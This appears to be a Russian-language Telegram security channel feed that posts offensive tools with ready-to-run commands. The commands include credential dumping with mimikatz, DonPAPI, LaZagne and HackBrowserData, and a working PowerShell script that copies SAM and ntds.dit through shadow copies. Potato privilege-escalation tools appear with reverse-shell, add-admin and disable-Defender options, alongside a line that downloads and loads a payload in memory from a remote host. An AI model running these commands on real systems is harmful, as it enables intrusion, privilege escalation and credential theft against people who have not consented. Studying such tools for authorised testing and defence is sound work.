Whitehat Lab
2.12K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
🏃 psobf v1.0 Powershell Obfuscator

Инструмент для обфускации PoSh скриптов, написан на 🖼️ Go

Установка:

go install github.com/TaurusOmar/psobf@latest


Запуск:

psobf -i .\revsh.ps1 -o revsh_obf.ps1 -level 1


На вход подаем оригинальный скрипт, на выход получаем обфусцированный и указываем уровень обфускации, всего их 5

Примеры:

# Original
Write-Host "Hello, World!"

# Obfuscated level 1
$obfuscated = $([char[]]("`W`,`r`,`i`,`t`,`e`,`-`,`H`,`o`,`s`,`t`,` `,`"`,`H`,`e`,`l`,`l`,`o`,`,` `,`W`,`o`,`r`,`l`,`d`,`!`,`"`") -join ''); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 2
$obfuscated = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI=')); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 3
$e = [System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI='); $obfuscated = [System.Text.Encoding]::UTF8.GetString($e); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 4
$compressed = 'H4sIAAAAAAAAC+NIzcnJVyjPL8pJUQQAlRmFGwwAAAA='; $bytes = [System.Convert]::FromBase64String($compressed); $stream = New-Object IO.MemoryStream(, $bytes); $decompressed = New-Object IO.Compression.GzipStream($stream, [IO.Compression.CompressionMode]::Decompress); $reader = New-Object IO.StreamReader($decompressed); $obfuscated = $reader.ReadToEnd(); Invoke-Expression $obfuscated


# Original
Write-Host "Hello, World!"

# Obfuscated level 5
$fragments = @(
'Write-',
'Output "',
'Hello,',
' Wo',
'rld!',
'"'
);
$script = $fragments -join '';
Invoke-Expression $script


🖥 Home

#soft #powershell #obfuscator #psobf

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⌨️ DonPAPI v1.2.0

DPAPI (Data Protection API) - крипто интерфейс в 💻Windows, который обеспечивает программам шифрование их сохраненных данных (пароли, cookie, токены и т.д.)

Данный инструмент позволяет забрать необходимые данные удаленно, написан на 🐍

Собираемые данные:

Chromium браузеры
Windows сертификаты
Диспетчер УД (Credential Manager)
Firefox
Mobaxterm
MRemoteNg
RDC Manager
SCCM
Vaults
VNC


Установка/Запуск:

pipx install donpapi

pipx run donpapi collect -u admin -p 'Password' -d domain.local -t ALL


GUI для просмотра собранных данных:

pipx run donpapi gui

https://127.0.0.1:8088


Поддерживает аутентификацию Kerberos, Pass The Hash
-k
--hashes
--aesKey

🖥 Home
➡️ Секреты DPAPI

#python #donpapi #soft #dpapi

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 Living Off The Land Active Directory

Exploiting Native AD Techniques for Security


😉 LOLAD

Проект
предоставляет обширную коллекцию методов, команд и функций 💻 Active Directory, которые можно использовать для операций по обеспечению безопасности и тренировки Redteam
Базу надо знать! 👍

Некоторые примеры:

# Collect Domain SID
Get-ADDomain | Select-Object SID

# Users with Delegation Privileges
Get-ADUser -Filter {TrustedForDelegation -eq $true}

# Get Domain Users Last Logon Time
Get-ADUser -Filter * -Properties LastLogonDate | Select Name, LastLogonDate

# List Users in Specific Group
Get-ADGroupMember -Identity "Domain Admins" | Select-Object Name, SamAccountName

# List Service Principal Names (SPNs)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} | Select-Object Name, ServicePrincipalName

# Check for Kerberos Pre-Authentication Disabled Accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Select Name, SamAccountName


💻 Home

#lolad #redteam #active_directory #powershell #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😉 🔄 NetExec (nxc) v1.3

NetExec является форком и продолжением утилиты crackmapexec

Отличный инструмент для проведения пентеста 😭 Active Directory (сбор информации, пост эксплуатация, брутфорс учетных данных)

Большое кол-во фиксов, изменений - подробнее

Поддержка протоколов:

mssql
winrm
vnc
ftp
rdp
ssh
ldap
wmi
smb
nfs


Установка в 🐧 Kali:

sudo apt update && sudo apt install netexec


Скачать:

💻 Windows
💻 MacOS

💻 Home
➡️ Docs

#nxc #netexec #python #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄🤖 APKLeaks v2.6.3

Сканер APK файлов на различные секреты, ссылки и эндпоинты. Написан на 🐍 Python

Установка:

pip3 install apkleaks

Запуск:

apkleaks -f ~/path/to/file.apk

💻 Home

#apkleaks #soft #python #reverse

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥💻 Evil-WinRM-ai v4.0 with AI LLM support

В данной версии интегрировали поддержку LLM 😄😱👍

🔩 Инструмент для подключения к 💻 Windows системам посредством WinRM (Windows Remote Management). Реализация WS-Management от 💻Microsoft. Стандартный протокол на основе SOAP, который позволяет взаимодействовать оборудованию и ОС разных производителей. Microsoft включила его в свои операционные системы, чтобы облегчить жизнь системным администраторам. По умолчанию служба работает на 5985, 5986 портах.

Установка Ollama:

curl -fsSL https://ollama.com/install.sh | sh

ollama pull llama3.1

ollama run llama3.1

# Проверка
curl -s -D - localhost:11434/api/chat -d '{"model":"llama3.1"}'


Установка Evil-WinRM:

sudo gem install evil-winrm-ai


Запуск разных моделей:

# Ollama, specifying an LLM model setting the URL of the listener containing the Ollama service

evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm ollama --llm-url 'https://127.0.0.1:11434' --llm-model ollama/llama3.1

# OpenAI, specifying an LLM model and enabling the LLM commands history

evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm openai --llm-api-key 'xxx' --llm-history --llm-model gpt-4o

# Gemini, just using it enabling debug mode
evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm gemini --llm-api-key 'xxx' --llm-debug

# Mistral-AI, specifying an LLM model
evil-winrm-ai -u Adm -p 'pass' -i 192.168.1.10 --llm mistral-ai --llm-api-key 'xxx' --llm-model open-mistral-7b


LLM опции:

--llm LLM (Ollama, Openai, Anthropic, Mistral-ai, Gemini, Azureopenai)
--llm-model модель LLM
--llm-url URL сервиса (Ollama и Azureopenai)
--llm-api-key ключ API
--llm-history история команд
--llm-debug отладка


После подключения к хосту используем команду ai: и далее наш промпт

ai:enumerate local users

ai:enumerate local groups


Возможности:

▪️ Загрузка PowerShell скриптов
▪️ Загрузка dll файлов
▪️ Запуск .NET приложений
▪️ Pass-the-hash,
▪️ Kerberos аутентификация
▪️ Поддержка SSL
▪️
Upload и Download файлов
▪️ История команд
▪️ Удобный и цветастый промпт


Запуск:

evil-winrm-ai -i 192.168.1.100 -u Adm -p 'pass' -s '/home/user/ps1_scripts/' -e '/home/user/exe_files/' --llm ollama --llm-url 'https://127.0.0.1:11434' --llm-model llama3.1:latest


💻 Home

#evilwinrm #winrm #pentest #ruby #llm #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
1
🔄 🖼️ Ferox buster v2.11.0

Современный высокоскоростной фаззер, написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.

Установка в Kali:

sudo apt update && sudo apt install -y feroxbuster


Windows
via chocolatey или winget:

choco install feroxbuster

winget install epi052.feroxbuster


Примеры:

feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx

feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"

feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080

cat targets | feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

feroxbuster -u https://127.1 --extract-links

feroxbuster -u https://127.1 --filter-status 301

feroxbuster -u https://127.1 --filter-regex '[aA]ccess [dD]enied.?' --output results.txt --json


💻 Home
👩‍💻 Документация

#feroxbuster #fuzzing #rust #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄❗️ Trivy v 0.61.0

Сканер уязвимостей в контейнерах и не только. Написан на 💻

Цели:

▪️ Контейнеры
▪️ Файловые системы
▪️ Git репозитории (удаленный)
▪️ Образы ВМ
▪️ Kubernetes
▪️ AWS

Сканирует:

▪️ ПО и зависимости
▪️ Известные уязвимости (CVEs)
▪️ Мисконфиги
▪️ Чувствительную информацию

Установка в 🐧 Debian like:

wget https://github.com/aquasecurity/trivy/releases/download/v0.56.2/trivy_0.56.2_Linux-64bit.deb

sudo dpkg -i trivy_0.56.2_Linux-64bit.deb


Примеры:

trivy <target> [--scanners <scanner1,scanner2>] <subject>

trivy image python:3.4-alpine

trivy fs --scanners vuln,secret,misconfig myproject/

trivy k8s --report summary cluster

trivy sbom /path/to/sbom_file


💻 Github
💻 Releases
📔 Docs

#trivy #soft #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻ApacheTomcatScanner v3.7.2

Узкоспециализированный инструмент написанный на 💻 python для поиска уязвимостей веб-сервера Apache Tomcat

Установка
:

sudo python3 -m pip install apachetomcatscanner


Запуск:

ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves


▪️ Проверка доступности
▪️ Многопоточность
▪️ Проверка стандартных УД
▪️ Определение версии
▪️ Список уязвимостей и CVE
▪️ Поддержка прокси
▪️ Экспорт в xlsx, json, sqlite

💻 Download

#tomcat #apache #apachetomcatscanner #soft #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄🔺 Dalfox 2.10.0

Мощный инструмент для поиска и обнаружения XSS уязвимостей. Написан на 🖼️ Go

Установка:
go install github.com/hahwul/dalfox/v2@latest

Пример:
dalfox url https://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff -b https://your-callback-url

💻 Home
🔠 Wiki

#soft #dalfox #golang

✈️Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 🗂 Доклады с конференции Black Hat USA 2024

Notes from Black Hat USA 2024:
“I hate to report it, but the Russian underground is as strong as ever”


🎃👍

💻 Home
💻 Download

#pentest #blackhat #blackhatusa

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🪟 📞 DeadPotato v 1.2

Пополнение в "картофельном" семействе. Как и для остальных необходима привилегия SeImpersonatePrivilege

Возможности:

deadpotato.exe -cmd "whoami"
deadpotato.exe -rev 192.168.10.30:9001
deadpotato.exe -exe paylod.exe
deadpotato.exe -newadmin adm:pass
deadpotato.exe -shell
deadpotato.exe -mimi sam
deadpotato.exe -defender off
deadpotato.exe -sharphound


💻 Home

#lpe #windows #potato #soft #csharp

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 📞 The LaZagne Project v2.4.6

Инструмент для восстановления забытых 😄 паролей, написан на Python 💻 На самом деле средство пост эксплуатации, поддерживается большое количество программ: браузеры, IM, почтовые клиенты.

📌 Список

Примеры использования:

laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password


💻 Home
💻 Download

#lazagne #python #password #recovery #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 Ghauri v1.4.2

🔺 Продвинутый кроссплатформенный инструмент, автоматизирующий процесс обнаружения и эксплуатации 🔥 SQL-инъекций.
Если вкратце то SQLMap на минималках 😃
Проект интересный. С простенькими заданиями справился, что приятно удивило!

Поддерживаемые техники:

Boolean based
Error Based
Time Based
Stacked Queries


Поддерживаемые СУБД:

MySQL
Microsoft SQL Server
Postgres
Oracle


Поддерживаемые типы:

GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML


⚙️ Установка и запуск:

git clone https://github.com/r0oth3x49/ghauri.git

python3 -m pip install --upgrade -r requirements.txt


python3 setup.py install

ghauri -u 'https://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs

💻 Download

#ghauri #sqli #sqlinjection #python #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😭 Windows dump SAM, NTDS

SAM - Security Account Manager. Хранит информацию о локальных пользователях, включая хеши паролей и идентификаторы

NTDS - основной файл ntds.dit NT Directory Services, dit - Directory Information Tree
БД в которой хранится информация обо всех объектах. Находится на контроллере домена

Есть различные варианты получить данные файлы, например с помощью mimikatz или NetExec

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"


nxc smb 192.168.1.100 -u da -p 'PASSWORDHERE' --sam

nxc smb 192.168.1.100 -u da -p 'PASSWORDHERE' --ntds


Доработал простенький скрипт на 🏃 PowerShell, который используя службу теневого копирования (VSS) позволит скопировать данные файлы. Необходимы повышенные привилегии

Работает на десктопных (понятно без ntds.dit) и на серверных системах, включая DC

Скрипт при необходимости создает директорию C:\Temp и копирует туда файлы, так же включает VSS и по окончании работы отключает.
Запускать в классическом 🏃 Windows PowerShell (в 7.x не отработает)

$vss=(Get-Service -name VSS)

if($vss.Status -ne "Running"){

$notrunning=1; $vss.Start()

}

$tempdir = "C:\Temp"

if (!(Test-Path $tempdir)) {

New-Item -ItemType Directory -Path $tempdir

}

$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")

cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" $tempdir
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" $tempdir

if (Test-Path -Path "C:\Windows\NTDS\ntds.dit") {

cmd /c copy "$($volume.DeviceObject)\Windows\NTDS\ntds.dit" $tempdir

}

$volume.Delete(); if($notrunning -eq 1){

$vss.Stop()

}


Полученные файлы разбираем в 💻 Kali использую secretsdump из пакета impacket

impacket-secretsdump LOCAL -sam SAM -system SYSTEM

impacket-secretsdump LOCAL -ntds ntds.dit -system SYSTEM


Что делать с хешиками вы уже знаете 😄👍

💻 Скрипт

#windows #sam #ntds #hashes #powershell

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 😀 RustScan v2.4.1

Очень быстрый сканер портов написанный на Rust

Установка в Debian like:

sudo dpkg -i rustscan_(ver).deb

Использование:

rustscan -a 127.0.0.1,0.0.0.0
rustscan -a 192.168.0.0/30
rustscan -a 'hosts.txt'
rustscan -a 127.0.0.1 --range 1-1000

💻 Home
💻 Download

#rustscan #rust #soft #recon

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 HackBrowserData v0.4.6

Инструмент помогающий вспомнить "забытые" пароли от различных браузеров. Также извлекает 🍪 cookie, закладки и историю. Написан на 💻 Go

Поддержка браузеров в 💻 Windows:

Google Chrome
Chromium
Microsoft Edge
360 Speed
QQ
Brave
Opera
OperaGX
Vivaldi
Yandex
CocCoc
Firefox


Примеры использования:

hack-browser-data.exe -b all -f json --dir results --zip

hack-browser-data.exe -b chrome -p "C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"


💻 Home
💻 Download

#hackbrowserdata #golang #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 NTLM hashes database

Сервис уже не новый, но крайне полезный
Я немного запоздал с постом 😄👍

🔗 https://ntlm.pw

#ntlm #hash

✈️Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🖼️ Ferox buster v2.11.0

Современный высокоскоростной фаззер написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.

Kali:
sudo apt update && sudo apt install -y feroxbuster

Windows
via chocolatey:
choco install feroxbuster

Примеры:

feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx

feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"

feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080


💻 Home
👩‍💻 Docs

#feroxbuster #fuzzing #rust #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🏃 SigmaPotato 1.2.6

Инструмент для повышения привилегий в 🏠 Windows системах основанный на эксплоитах "картофельного" семейства (в частности GodPotato)
Напомню что для реализации необходимо чтобы УЗ обладала привилегией SeImpersonatePrivilege или SeAssignPrimaryTokenPrivilege

Обычно присутствует у сервисных УЗ, например IIS, MSSQL и т.д.

whoami /priv

Из плюсов возможность запуска как с диска, так и из памяти, а также создание revshell'a

Примеры:

./SigmaPotato.exe --revshell ip port

[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))

[SigmaPotato]::Main(@("--revshell","ip","port"))


Windows 8/8.1 - Windows 11
Windows Server 2012 - Windows 2022


💻 Home
💻 Download

#potato #lpe #windows #soft #sigmapotato

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM